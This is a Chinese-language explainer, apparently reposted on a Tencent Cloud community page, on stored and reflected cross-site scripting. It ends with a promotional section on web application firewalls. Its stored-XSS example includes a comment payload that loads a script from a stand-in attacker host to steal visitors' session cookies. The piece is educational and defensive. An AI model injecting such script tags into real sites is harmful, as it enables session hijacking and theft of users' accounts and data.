跨站点脚本(XSS)攻击

什么是跨站点脚本(XSS)

跨站点脚本(XSS)是一种常见的攻击媒介,可将恶意代码注入易受攻击的Web应用程序。XSS不同于其他网络攻击媒介(例如SQL注入),因为它不直接针对应用程序本身。相反,Web应用程序的用户是有风险的用户。

一次成功的跨站脚本攻击可能会对网上企业的声誉及其与客户的关系造成破坏性后果。

根据攻击的严重程度,用户帐户可能会受到危害,特洛伊木马程序被激活,页面内容被修改,误导用户愿意放弃他们的私人数据。最后,可以揭示会话cookie,使犯罪者能够冒充有效用户并滥用他们的私人账户。

跨站点脚本攻击可以分为两种类型:存储和反映。

存储的XSS,也称为持续XSS,是两者中更具破坏性的。当恶意脚本直接注入易受攻击的Web应用程序时会发生。

反映的XSS涉及将恶意脚本从Web应用程序反映到用户的浏览器中。该脚本嵌入到链接中,只有在单击该链接时才会激活该脚本。

什么是存储跨站点脚本

要成功执行存储的XSS攻击,攻击者必须在Web应用程序中找到漏洞,然后将恶意脚本注入其服务器(例如,通过注释字段)。

最常见的目标之一是允许用户共享内容的网站,包括博客,社交网络,视频共享平台和留言板。每次查看受感染页面时,恶意脚本都会传输到受害者的浏览器。

存储的XSS攻击示例

在浏览电子商务网站时,犯罪者发现了一个漏洞,该漏洞允许HTML标签嵌入网站的评论部分。嵌入式标签成为页面的永久功能,每当页面打开时,浏览器就会用源代码的其余部分解析它们。

攻击者添加下面的评论:伟大的物品的好价钱!在这里阅读我的评论<script src =“http://hackersite.com/authstealer.js”> </ script>。

从这一点开始,每次访问页面时,评论中的HTML标签都会激活托管在另一个站点上的JavaScript文件,并且能够窃取访问者的会话cookie。

使用会话cookie,攻击者可以危害访问者的账户,使他能够轻松访问他的个人信息和信用卡数据。与此同时,访问者甚至可能永远不会滚动到评论部分,也不知道发生了攻击。

与反射式攻击不同,在单击链接后激活脚本的情况下,存储的攻击只需要受害者访问受攻击的网页。这增加了袭击的范围,无论他们的警惕程度如何,都会危及所有游客。

从犯罪者的角度来看,持续的XSS攻击相对难以执行,因为定位被贩运的网站和使用永久性脚本嵌入漏洞的网站存在困难。

存储的XSS攻击预防/缓解

Web应用程序防火墙(WAF)是防止XSS和Web应用程序攻击的最常用解决方案。

WAF采用不同的方法来抵抗攻击媒介。在XSS的情况下,大多数将依靠基于签名的过滤来识别和阻止恶意请求。

根据行业最佳实践,Imperva Incapsula的网络应用防火墙还采用签名过滤来应对跨站点脚本攻击。

Incapsula WAF作为托管服务提供,由一组安全专家定期维护,安全专家不断更新带有新发现攻击媒介签名的安全规则集。

Incapsula众包技术自动收集并整合来自其网络的攻击数据,为所有客户带来益处。

众包方法能够对零日威胁做出非常快速的响应,一旦发现单一攻击企图,就可以保护整个用户群免受任何新的威胁。

众包还可以使用IP信誉系统来阻止重犯,包括僵尸网络资源,这些资源往往会被多个犯罪者重复使用。

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏黑白安全

西门子 SIPROTEC、Reyrolle 设备曝高危漏洞,或致变电站等供电设施遭受攻击

近日, ICS-CERT 发布安全报告称西门子 SIPROTEC 4,SIPROTEC Compact 以及 Reyrolle 设备存在的三个漏洞可能会被黑客利...

12140
来自专栏ImportSource

NoSQL-ReadConsistency-读取一致性

翻译内容: NoSQL Distilled 第五章 Consistency 一致性 作者简介: ? 本节摘要: 一致性向来是分布式...

34150
来自专栏FreeBuf

Web开发者安全速查表

想要开发出一个安全的、健壮的Web应用其实是非常困难的,如果你觉得这实现起来非常简单的话,那么你一定是一个X炸天的程序猿,要么你就是在白日做梦…… 写在前面的话...

25490
来自专栏Youngxj

[安卓软件]时间解锁TimeUnlock 2.0

24030
来自专栏黑白安全

黑客技术?没你想象的那么难!——dns劫持篇

在网络中,机器之间只认识IP地址,机器之间最终都要通过IP来互相访问。但是为了方便记忆,可以为IP地址设置一个对应的域名,通过访问域名,就可以找到对应IP地址的...

2.9K30
来自专栏小文博客

小文’s blog — win7最新升级win10教程

17230
来自专栏菜鸟程序员

AVGater漏洞突破防病毒软件 影响大批知名杀毒软件 PoC已经公开

18050
来自专栏信安之路

【读者投稿】wifi渗透-狸猫换太子

上期作者发布了一篇关于wifi钓鱼的方法,今天我来给大佬们带来一篇关于拿到wifi密码能干什么?

16800
来自专栏君赏技术博客

模块化架构你为什么这么火,让我如此亲睐你?

前几天就开始研究了关于新项目的架构,也研究了模块化架构和关于Cocoapods私有库的研究。

17230
来自专栏小狼的世界

防止Memcached的DDOS攻击另外一个思路

3月3日,国家互联网应急中心通报了一条消息 关于利用memcached服务器实施反射DDoS攻击的情况通报 通告了 memcached 服务器漏洞被黑客利用的情...

13250

扫码关注云+社区

领取腾讯云代金券